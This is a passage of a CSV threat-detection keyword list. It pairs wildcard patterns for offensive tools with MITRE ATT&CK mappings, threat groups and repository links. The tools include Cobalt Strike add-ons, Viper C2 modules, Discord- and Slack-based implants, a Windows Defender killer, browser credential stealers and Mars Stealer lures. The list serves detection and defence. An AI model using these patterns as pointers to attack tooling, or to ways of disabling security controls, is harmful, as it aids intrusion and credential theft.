,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*disableeventvwr/*.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*DisableKerberosSigning*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*DisableMailboxAuditing.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableMFA.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableRealtimeMonitoring $true*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*disableWinDef.cpp*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*Disabling ASLR *,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*discordapp.com/attachments/*/AnyDesk.exe*,offensive_tool_keyword,anydesk,Fake Anydesk distributed by discord - mars stealer,T1566 T1587,N/A,N/A,N/A,Malware,https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*discordapp.com/attachments/*/BOINCPortable_*.exe*,offensive_tool_keyword,BOINC,Fake BOINC software distributed by discord - mars stealer,T1566 T1587,N/A,N/A,N/A,Malware,https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Discovery_AccountDiscovery_GetNetDomainUser.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_AccountDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*Discovery_ApplicationWindowDiscovery_EnumApplication.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_CallInfo.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_camera.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_Microphone_record_mic.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - 
T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_ARPScan.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_NbtScanByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_NextnetByPE.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PingByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PortScanByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_NetworkShareDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is 
a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_PermissionGroupsDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_QueryRegistry_GetDotNetVersions.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_QueryRegistry_GetRDPPort.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - 
T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetNetComputer.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_RemoteSystemDiscovery_GetNetDomain.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly 
used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Disctopia Backdoor*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,0,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*disctopia-c2.git*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*disctopia-c2-main.zip*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*DiskCryptor Device Installation Disk*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk 
partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DiskCryptor driver*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DISKCRYPTOR_MUTEX*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*diskcryptor2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*DiskCryptor-master*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*diskshadow list shadows all*,greyware_tool_keyword,diskshadow,List shadow copies using diskshadow,T1059.003 - T1059.001 - T1005,TA0002 - TA0005 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dist*_brc4.x64.o*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist*_brc4.x86.o*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos 
tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist/agent.upx.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*dist/agent.windows.exe*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*dist/nanorobeus_cs.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*dist/shadow.exe*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*dist\shadow.exe*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ditty/ditty.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SimoneLazzaris/ditty,1,1,N/A,N/A,1,2,1,2022-03-10T16:15:14Z,2022-03-09T09:20:27Z 
-*djhohnstein/SharpChromium*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*dl.wireshark.org*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dlink_central_wifimanager_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dlink_sharecenter_cmd_exec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*dlink_telnet_backdoor_userpass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dll* [HIJACKABLE]*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*dll\reflective_dll.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,0,N/A,10,,N/A,,, -*dll_generator.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - 